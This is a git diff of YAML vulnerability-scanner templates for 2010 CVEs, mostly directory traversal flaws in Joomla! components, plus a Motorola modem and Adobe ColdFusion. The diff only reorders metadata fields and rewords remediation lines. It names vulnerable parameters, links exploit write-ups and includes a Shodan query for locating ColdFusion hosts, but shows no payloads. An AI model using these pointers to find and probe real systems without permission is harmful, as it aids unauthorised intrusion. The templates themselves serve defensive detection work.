fbb218acf8..69988a1239 100644 --- a/http/cves/2010/CVE-2010-1979.yaml +++ b/http/cves/2010/CVE-2010-1979.yaml @@ -5,20 +5,20 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the Affiliate Datafeeds (com_datafeeds) component build 880 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12088 - https://nvd.nist.gov/vuln/detail/CVE-2010-1979 - http://www.exploit-db.com/exploits/12088 - https://exchange.xforce.ibmcloud.com/vulnerabilities/57570 - remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P cvss-score: 6.8 cve-id: CVE-2010-1979 cwe-id: CWE-22 epss-score: 0.00826 - cpe: cpe:2.3:a:affiliatefeeds:com_datafeeds:build_880:*:*:*:*:*:*:* epss-percentile: 0.79783 + cpe: cpe:2.3:a:affiliatefeeds:com_datafeeds:build_880:*:*:*:*:*:*:* metadata: max-request: 1 vendor: affiliatefeeds diff --git a/http/cves/2010/CVE-2010-1980.yaml b/http/cves/2010/CVE-2010-1980.yaml index d707f68994..525dd59f40 100644 --- a/http/cves/2010/CVE-2010-1980.yaml +++ b/http/cves/2010/CVE-2010-1980.yaml @@ -5,21 +5,21 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in joomlaflickr.php in the Joomla! Flickr (com_joomlaflickr) component 1.0.3 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12085 - https://nvd.nist.gov/vuln/detail/CVE-2010-1980 - http://packetstormsecurity.org/1004-exploits/joomlaflickr-lfi.txt - http://www.exploit-db.com/exploits/12085 - http://bitbucket.org/roberto.aloi/joomla-flickr/changeset/64ebf6b25030 - remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-1980 cwe-id: CWE-22 epss-score: 0.02401 - cpe: cpe:2.3:a:roberto_aloi:com_joomlaflickr:1.0.3:*:*:*:*:*:*:* epss-percentile: 0.88504 + cpe: cpe:2.3:a:roberto_aloi:com_joomlaflickr:1.0.3:*:*:*:*:*:*:* metadata: max-request: 1 vendor: roberto_aloi diff --git a/http/cves/2010/CVE-2010-1981.yaml b/http/cves/2010/CVE-2010-1981.yaml index 8246b0db64..4190e6e9b4 100644 --- a/http/cves/2010/CVE-2010-1981.yaml +++ b/http/cves/2010/CVE-2010-1981.yaml @@ -5,26 +5,26 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the Fabrik (com_fabrik) component 2.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12087 - https://nvd.nist.gov/vuln/detail/CVE-2010-1981 - http://packetstormsecurity.org/1004-exploits/joomlafabrik-lfi.txt - http://www.exploit-db.com/exploits/12087 - https://exchange.xforce.ibmcloud.com/vulnerabilities/57571 - remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P cvss-score: 6.8 cve-id: CVE-2010-1981 cwe-id: CWE-22 epss-score: 0.00656 - cpe: cpe:2.3:a:fabrikar:fabrik:2.0:*:*:*:*:joomla\!:*:* epss-percentile: 0.76877 + cpe: cpe:2.3:a:fabrikar:fabrik:2.0:*:*:*:*:joomla\!:*:* metadata: max-request: 1 - framework: joomla\! vendor: fabrikar product: fabrik + framework: joomla\! tags: cve,cve2010,joomla,lfi,edb,packetstorm http: diff --git a/http/cves/2010/CVE-2010-1982.yaml b/http/cves/2010/CVE-2010-1982.yaml index 1335192d92..4217d612fc 100644 --- a/http/cves/2010/CVE-2010-1982.yaml +++ b/http/cves/2010/CVE-2010-1982.yaml @@ -5,18 +5,18 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the JA Voice (com_javoice) component 2.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12121 - https://nvd.nist.gov/vuln/detail/CVE-2010-1982 - remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2010-1982 cwe-id: CWE-22 epss-score: 0.00477 - cpe: cpe:2.3:a:joomlart:com_javoice:2.0:*:*:*:*:*:*:* epss-percentile: 0.72681 + cpe: cpe:2.3:a:joomlart:com_javoice:2.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: joomlart diff --git a/http/cves/2010/CVE-2010-1983.yaml b/http/cves/2010/CVE-2010-1983.yaml index 0a026a15ca..143116f43b 100644 --- a/http/cves/2010/CVE-2010-1983.yaml +++ b/http/cves/2010/CVE-2010-1983.yaml @@ -5,21 +5,21 @@ info: author: daffainfo severity: high description: A drectory traversal vulnerability in the redTWITTER (com_redtwitter) component 1.0.x including 1.0b11 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12055 - https://nvd.nist.gov/vuln/detail/CVE-2010-1983 - http://packetstormsecurity.org/1004-exploits/joomlaredtwitter-lfi.txt - http://www.exploit-db.com/exploits/12055 - https://exchange.xforce.ibmcloud.com/vulnerabilities/57511 - remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-1983 cwe-id: CWE-22 epss-score: 0.01815 - cpe: cpe:2.3:a:redcomponent:com_redtwitter:1.0b8:*:*:*:*:*:*:* epss-percentile: 0.8667 + cpe: cpe:2.3:a:redcomponent:com_redtwitter:1.0b8:*:*:*:*:*:*:* metadata: max-request: 1 vendor: redcomponent diff --git a/http/cves/2010/CVE-2010-2033.yaml b/http/cves/2010/CVE-2010-2033.yaml index d67c1bbacd..5ca9f60fc1 100644 --- a/http/cves/2010/CVE-2010-2033.yaml +++ b/http/cves/2010/CVE-2010-2033.yaml @@ -5,18 +5,18 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the Percha Fields Attach (com_perchafieldsattach) component 1.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://packetstormsecurity.com/files/89654/Joomla-Percha-Categories-Tree-0.6-Local-File-Inclusion.html - https://nvd.nist.gov/vuln/detail/CVE-2010-2033 - remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-2033 cwe-id: CWE-22 epss-score: 0.00826 - cpe: cpe:2.3:a:percha:com_perchacategoriestree:0.6:*:*:*:*:*:*:* epss-percentile: 0.79783 + cpe: cpe:2.3:a:percha:com_perchacategoriestree:0.6:*:*:*:*:*:*:* metadata: max-request: 1 vendor: percha diff --git a/http/cves/2010/CVE-2010-2034.yaml b/http/cves/2010/CVE-2010-2034.yaml index c103d239ca..d700c91591 100644 --- a/http/cves/2010/CVE-2010-2034.yaml +++ b/http/cves/2010/CVE-2010-2034.yaml @@ -5,20 +5,20 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the Percha Image Attach (com_perchaimageattach) component 1.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/34003 - https://nvd.nist.gov/vuln/detail/CVE-2010-2034 - http://packetstormsecurity.org/1005-exploits/joomlaperchaia-lfi.txt - http://web.archive.org/web/20210615115919/https://www.securityfocus.com/bid/40244 - remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-2034 cwe-id: CWE-22 epss-score: 0.00718 - cpe: cpe:2.3:a:percha:com_perchaimageattach:1.1:*:*:*:*:*:*:* epss-percentile: 0.78113 + cpe: cpe:2.3:a:percha:com_perchaimageattach:1.1:*:*:*:*:*:*:* metadata: max-request: 1 vendor: percha diff --git a/http/cves/2010/CVE-2010-2035.yaml b/http/cves/2010/CVE-2010-2035.yaml index eb96825282..06ddd8ceb0 100644 --- a/http/cves/2010/CVE-2010-2035.yaml +++ b/http/cves/2010/CVE-2010-2035.yaml @@ -5,20 +5,20 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the Percha Gallery (com_perchagallery) component 1.6 Beta for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/34006 - https://nvd.nist.gov/vuln/detail/CVE-2010-2035 - http://web.archive.org/web/20210615115919/https://www.securityfocus.com/bid/40244 - http://packetstormsecurity.org/1005-exploits/joomlaperchagl-lfi.txt - remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-2035 cwe-id: CWE-22 epss-score: 0.00718 - cpe: cpe:2.3:a:percha:com_perchagallery:1.6:beta:*:*:*:*:*:* epss-percentile: 0.78113 + cpe: cpe:2.3:a:percha:com_perchagallery:1.6:beta:*:*:*:*:*:* metadata: max-request: 1 vendor: percha diff --git a/http/cves/2010/CVE-2010-2036.yaml b/http/cves/2010/CVE-2010-2036.yaml index a92402e547..0789ec5658 100644 --- a/http/cves/2010/CVE-2010-2036.yaml +++ b/http/cves/2010/CVE-2010-2036.yaml @@ -5,20 +5,20 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the Percha Fields Attach (com_perchafieldsattach) component 1.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/34004 - https://nvd.nist.gov/vuln/detail/CVE-2010-2036 - http://packetstormsecurity.org/1005-exploits/joomlaperchafa-lfi.txt - http://web.archive.org/web/20210615115919/https://www.securityfocus.com/bid/40244 - remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-2036 cwe-id: CWE-22 epss-score: 0.00718 - cpe: cpe:2.3:a:percha:com_perchafieldsattach:1.0:*:*:*:*:*:*:* epss-percentile: 0.78113 + cpe: cpe:2.3:a:percha:com_perchafieldsattach:1.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: percha diff --git a/http/cves/2010/CVE-2010-2037.yaml b/http/cves/2010/CVE-2010-2037.yaml index ff9b32ffa6..a6a87d6481 100644 --- a/http/cves/2010/CVE-2010-2037.yaml +++ b/http/cves/2010/CVE-2010-2037.yaml @@ -5,20 +5,20 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the Percha Downloads Attach (com_perchadownloadsattach) component 1.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/34005 - https://nvd.nist.gov/vuln/detail/CVE-2010-2037 - http://web.archive.org/web/20210615115919/https://www.securityfocus.com/bid/40244 - http://packetstormsecurity.org/1005-exploits/joomlaperchada-lfi.txt - remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-2037 cwe-id: CWE-22 epss-score: 0.00718 - cpe: cpe:2.3:a:percha:com_perchadownloadsattach:1.1:*:*:*:*:*:*:* epss-percentile: 0.78113 + cpe: cpe:2.3:a:percha:com_perchadownloadsattach:1.1:*:*:*:*:*:*:* metadata: max-request: 1 vendor: percha diff --git a/http/cves/2010/CVE-2010-2045.yaml b/http/cves/2010/CVE-2010-2045.yaml index 82c5ba09d4..386617fa95 100644 --- a/http/cves/2010/CVE-2010-2045.yaml +++ b/http/cves/2010/CVE-2010-2045.yaml @@ -5,20 +5,20 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the Dione Form Wizard (aka FDione or com_dioneformwizard) component 1.0.2 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12595 - https://nvd.nist.gov/vuln/detail/CVE-2010-2045 - http://packetstormsecurity.org/1005-exploits/joomlafdione-lfi.txt - https://exchange.xforce.ibmcloud.com/vulnerabilities/58574 - remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-2045 cwe-id: CWE-22 epss-score: 0.01671 - cpe: cpe:2.3:a:dionesoft:com_dioneformwizard:1.0.2:*:*:*:*:*:*:* epss-percentile: 0.86069 + cpe: cpe:2.3:a:dionesoft:com_dioneformwizard:1.0.2:*:*:*:*:*:*:* metadata: max-request: 1 vendor: dionesoft diff --git a/http/cves/2010/CVE-2010-2050.yaml b/http/cves/2010/CVE-2010-2050.yaml index 2c7805e3e4..9d90510fc8 100644 --- a/http/cves/2010/CVE-2010-2050.yaml +++ b/http/cves/2010/CVE-2010-2050.yaml @@ -5,21 +5,21 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the Moron Solutions MS Comment (com_mscomment) component 0.8.0b for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12611 - https://nvd.nist.gov/vuln/detail/CVE-2010-2050 - http://packetstormsecurity.org/1005-exploits/joomlamscomment-lfi.txt - http://www.vupen.com/english/advisories/2010/1159 - https://exchange.xforce.ibmcloud.com/vulnerabilities/58619 - remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-2050 cwe-id: CWE-22 epss-score: 0.03527 - cpe: cpe:2.3:a:m0r0n:com_mscomment:0.8.0:b:*:*:*:*:*:* epss-percentile: 0.90353 + cpe: cpe:2.3:a:m0r0n:com_mscomment:0.8.0:b:*:*:*:*:*:* metadata: max-request: 1 vendor: m0r0n diff --git a/http/cves/2010/CVE-2010-2122.yaml b/http/cves/2010/CVE-2010-2122.yaml index 7cc6277ba9..95e9e13594 100644 --- a/http/cves/2010/CVE-2010-2122.yaml +++ b/http/cves/2010/CVE-2010-2122.yaml @@ -5,21 +5,21 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the SimpleDownload (com_simpledownload) component before 0.9.6 for Joomla! allows remote attackers to retrieve arbitrary files via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12623 - https://nvd.nist.gov/vuln/detail/CVE-2010-2122 - https://www.exploit-db.com/exploits/12618 - http://extensions.joomla.org/extensions/directory-a-documentation/downloads/10717 - https://exchange.xforce.ibmcloud.com/vulnerabilities/58625 - remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P cvss-score: 6.8 cve-id: CVE-2010-2122 cwe-id: CWE-22 epss-score: 0.01806 - cpe: cpe:2.3:a:joelrowley:com_simpledownload:0.9.5:*:*:*:*:*:*:* epss-percentile: 0.86643 + cpe: cpe:2.3:a:joelrowley:com_simpledownload:0.9.5:*:*:*:*:*:*:* metadata: max-request: 1 vendor: joelrowley diff --git a/http/cves/2010/CVE-2010-2128.yaml b/http/cves/2010/CVE-2010-2128.yaml index c658a8fe83..0b9e6a917b 100644 --- a/http/cves/2010/CVE-2010-2128.yaml +++ b/http/cves/2010/CVE-2010-2128.yaml @@ -5,20 +5,20 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the JE Quotation Form (com_jequoteform) component 1.0b1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the view parameter to index.php. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12607 - https://nvd.nist.gov/vuln/detail/CVE-2010-2128 - http://www.exploit-db.com/exploits/12607 - https://exchange.xforce.ibmcloud.com/vulnerabilities/58593 - remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-2128 cwe-id: CWE-22 epss-score: 0.01242 - cpe: cpe:2.3:a:harmistechnology:com_jequoteform:1.0:b1:*:*:*:*:*:* epss-percentile: 0.83796 + cpe: cpe:2.3:a:harmistechnology:com_jequoteform:1.0:b1:*:*:*:*:*:* metadata: max-request: 1 vendor: harmistechnology diff --git a/http/cves/2010/CVE-2010-2259.yaml b/http/cves/2010/CVE-2010-2259.yaml index 335e4e7f58..fc01ea65b1 100644 --- a/http/cves/2010/CVE-2010-2259.yaml +++ b/http/cves/2010/CVE-2010-2259.yaml @@ -5,20 +5,20 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the BF Survey (com_bfsurvey) component for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/10946 - https://nvd.nist.gov/vuln/detail/CVE-2010-2259 - http://www.exploit-db.com/exploits/10946 - http://www.tamlyncreative.com.au/software/forum/index.php?topic=641.0 - remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-2259 cwe-id: CWE-22 epss-score: 0.01671 - cpe: cpe:2.3:a:tamlyncreative:com_bfsurvey_profree:1.2.6:*:*:*:*:*:*:* epss-percentile: 0.86069 + cpe: cpe:2.3:a:tamlyncreative:com_bfsurvey_profree:1.2.6:*:*:*:*:*:*:* metadata: max-request: 1 vendor: tamlyncreative diff --git a/http/cves/2010/CVE-2010-2307.yaml b/http/cves/2010/CVE-2010-2307.yaml index c7cb85b9c2..462c397774 100644 --- a/http/cves/2010/CVE-2010-2307.yaml +++ b/http/cves/2010/CVE-2010-2307.yaml @@ -5,20 +5,20 @@ info: author: daffainfo severity: medium description: Multiple directory traversal vulnerabilities in the web server for Motorola SURFBoard cable modem SBV6120E running firmware SBV6X2X-1.0.0.5-SCM-02-SHPC allow remote attackers to read arbitrary files via (1) "//" (multiple leading slash), (2) ../ (dot dot) sequences, and encoded dot dot sequences in a URL request. + remediation: Upgrade to a supported product version. reference: - https://nvd.nist.gov/vuln/detail/CVE-2010-2307 - https://www.exploit-db.com/exploits/12865 - http://www.exploit-db.com/exploits/12865 - https://exchange.xforce.ibmcloud.com/vulnerabilities/59113 - remediation: Upgrade to a supported product version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2010-2307 cwe-id: CWE-22 epss-score: 0.00832 - cpe: cpe:2.3:h:motorola:surfboard_sbv6120e:sbv6x2x-1.0.0.5-scm-02-shpc:*:*:*:*:*:*:* epss-percentile: 0.7986 + cpe: cpe:2.3:h:motorola:surfboard_sbv6120e:sbv6x2x-1.0.0.5-scm-02-shpc:*:*:*:*:*:*:* metadata: max-request: 1 vendor: motorola diff --git a/http/cves/2010/CVE-2010-2507.yaml b/http/cves/2010/CVE-2010-2507.yaml index d06a2801c0..6474e0f8ec 100644 --- a/http/cves/2010/CVE-2010-2507.yaml +++ b/http/cves/2010/CVE-2010-2507.yaml @@ -5,20 +5,20 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the Picasa2Gallery (com_picasa2gallery) component 1.2.8 and earlier for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/13981 - https://nvd.nist.gov/vuln/detail/CVE-2010-2507 - http://packetstormsecurity.org/1006-exploits/joomlapicasa2gallery-lfi.txt - https://exchange.xforce.ibmcloud.com/vulnerabilities/59669 - remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P cvss-score: 6.8 cve-id: CVE-2010-2507 cwe-id: CWE-22 epss-score: 0.01671 - cpe: cpe:2.3:a:masselink:com_picasa2gallery:*:*:*:*:*:*:*:* epss-percentile: 0.86069 + cpe: cpe:2.3:a:masselink:com_picasa2gallery:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: masselink diff --git a/http/cves/2010/CVE-2010-2680.yaml b/http/cves/2010/CVE-2010-2680.yaml index fbc5620daa..324361d394 100644 --- a/http/cves/2010/CVE-2010-2680.yaml +++ b/http/cves/2010/CVE-2010-2680.yaml @@ -5,20 +5,20 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the JExtensions JE Section/Property Finder (jesectionfinder) component for Joomla! allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the view parameter to index.php. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/14064 - https://nvd.nist.gov/vuln/detail/CVE-2010-2680 - http://packetstormsecurity.org/1006-exploits/joomlajesectionfinder-lfi.txt - https://exchange.xforce.ibmcloud.com/vulnerabilities/59796 - remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P cvss-score: 6.8 cve-id: CVE-2010-2680 cwe-id: CWE-22 epss-score: 0.00826 - cpe: cpe:2.3:a:harmistechnology:com_jesectionfinder:*:*:*:*:*:*:*:* epss-percentile: 0.79783 + cpe: cpe:2.3:a:harmistechnology:com_jesectionfinder:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: harmistechnology diff --git a/http/cves/2010/CVE-2010-2682.yaml b/http/cves/2010/CVE-2010-2682.yaml index 2f2941a8f3..262d95e344 100644 --- a/http/cves/2010/CVE-2010-2682.yaml +++ b/http/cves/2010/CVE-2010-2682.yaml @@ -5,21 +5,21 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the Realtyna Translator (com_realtyna) component 1.0.15 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/14017 - https://nvd.nist.gov/vuln/detail/CVE-2010-2682 - http://packetstormsecurity.org/1004-exploits/joomlarealtyna-lfi.txt - http://www.exploit-db.com/exploits/14017 - https://exchange.xforce.ibmcloud.com/vulnerabilities/57647 - remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-2682 cwe-id: CWE-22 epss-score: 0.00826 - cpe: cpe:2.3:a:realtyna:com_realtyna:1.0.15:*:*:*:*:*:*:* epss-percentile: 0.79783 + cpe: cpe:2.3:a:realtyna:com_realtyna:1.0.15:*:*:*:*:*:*:* metadata: max-request: 1 vendor: realtyna diff --git a/http/cves/2010/CVE-2010-2857.yaml b/http/cves/2010/CVE-2010-2857.yaml index cce491629c..d750cd5c80 100644 --- a/http/cves/2010/CVE-2010-2857.yaml +++ b/http/cves/2010/CVE-2010-2857.yaml @@ -5,20 +5,20 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the Music Manager component for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the cid parameter to album.html. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/14274 - https://nvd.nist.gov/vuln/detail/CVE-2010-2857 - http://www.exploit-db.com/exploits/14274 - https://exchange.xforce.ibmcloud.com/vulnerabilities/60195 - remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P cvss-score: 6.8 cve-id: CVE-2010-2857 cwe-id: CWE-22 epss-score: 0.00826 - cpe: cpe:2.3:a:danieljamesscott:com_music:0.1:-:*:*:*:*:*:* epss-percentile: 0.79783 + cpe: cpe:2.3:a:danieljamesscott:com_music:0.1:-:*:*:*:*:*:* metadata: max-request: 1 vendor: danieljamesscott diff --git a/http/cves/2010/CVE-2010-2861.yaml b/http/cves/2010/CVE-2010-2861.yaml index 6d5aa6ab06..cf8ddad9ab 100644 --- a/http/cves/2010/CVE-2010-2861.yaml +++ b/http/cves/2010/CVE-2010-2861.yaml @@ -5,26 +5,26 @@ info: author: pikpikcu severity: high description: Multiple directory traversal vulnerabilities in the administrator console in Adobe ColdFusion 9.0.1 and earlier allow remote attackers to read arbitrary files via the locale parameter to (1) CFIDE/administrator/settings/mappings.cfm, (2) logging/settings.cfm, (3) datasources/index.cfm, (4) j2eepackaging/editarchive.cfm, and (5) enter.cfm in CFIDE/administrator/. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://github.com/vulhub/vulhub/tree/master/coldfusion/CVE-2010-2861 - http://www.adobe.com/support/security/bulletins/apsb10-18.html - http://securityreason.com/securityalert/8148 - http://securityreason.com/securityalert/8137 - http://www.gnucitizen.org/blog/coldfusion-directory-traversal-faq-cve-2010-2861/ - remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-2861 cwe-id: CWE-22 epss-score: 0.97321 - cpe: cpe:2.3:a:adobe:coldfusion:*:*:*:*:*:*:*:* epss-percentile: 0.99812 + cpe: cpe:2.3:a:adobe:coldfusion:*:*:*:*:*:*:*:* metadata: max-request: 1 - shodan-query: http.component:"Adobe ColdFusion" vendor: adobe product: coldfusion + shodan-query: http.component:"Adobe ColdFusion" tags: adobe,kev,vulhub,cve,cve2010,coldfusion,lfi http: diff --git a/http/cves/2010/CVE-2010-2918.yaml b/http/cves/2010/CVE-2010-2918.yaml index 1e328aaef9..96cd1d53d3 100644 --- a/http/cves/2010/CVE-2010-2918.yaml +++ b/http/cves/2010/CVE-2010-2918.yaml @@ -5,21 +5,21 @@ info: author: daffainfo severity: high description: A PHP remote file inclusion vulnerability in core/include/myMailer.class.php in the Visites (com_joomla-visites) component 1.1 RC2 for Joomla! allows remote attackers to execute arbitrary PHP code via a URL in the mosConfig_absolute_path parameter. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/31708 - https://nvd.nist.gov/vuln/detail/CVE-2010-2918 - https://www.exploit-db.com/exploits/14476 - http://www.vupen.com/english/advisories/2010/1925 - https://exchange.xforce.ibmcloud.com/vulnerabilities/42025 - remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-2918 cwe-id: CWE-94 epss-score: 0.02847 - cpe: cpe:2.3:a:visocrea:com_joomla_visites:1.1:rc2:*:*:*:*:*:* epss-percentile: 0.89382 + cpe: cpe:2.3:a:visocrea:com_joomla_visites:1.1:rc2:*:*:*:*:*:* metadata: max-request: 1 vendor: visocrea diff --git a/http/cves/2010/CVE-2010-2920.yaml b/http/cves/2010/CVE-2010-2920.yaml index f8f9460613..96f32823d8 100644 --- a/http/cves/2010/CVE-2010-2920.yaml +++ b/http/cves/2010/CVE-2010-2920.yaml @@ -5,20 +5,20 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the Foobla Suggestions (com_foobla_suggestions) component 1.5.1.2 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12120 - https://nvd.nist.gov/vuln/detail/CVE-2010-2920 - http://www.vupen.com/english/advisories/2010/1844 - https://exchange.xforce.ibmcloud.com/vulnerabilities/57660 - remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P cvss-score: 6.8 cve-id: CVE-2010-2920 cwe-id: CWE-22 epss-score: 0.03527 - cpe: cpe:2.3:a:foobla:com_foobla_suggestions:1.5.1.2:*:*:*:*:*:*:* epss-percentile: 0.90353 + cpe: cpe:2.3:a:foobla:com_foobla_suggestions:1.5.1.2:*:*:*:*:*:*:* metadata: max-request: 1 vendor: foobla diff --git a/http/cves/2010/CVE-2010-3203.yaml b/http/cves/2010/CVE-2010-3203.yaml index 01383e6a55..9be091cbe4 100644 --- a/http/cves/2010/CVE-2010-3203.yaml +++ b/http/cves/2010/CVE-2010-3203.yaml @@ -5,20 +5,20 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the PicSell (com_picsell) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the dflink parameter in a prevsell dwnfree action to index.php. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/14845 - https://nvd.nist.gov/vuln/detail/CVE-2010-3203 - http://web.archive.org/web/20150105095919/http://secunia.com:80/advisories/41187/ - http://www.exploit-db.com/exploits/14845 - remediation: Upgrade to a supported version. classification: 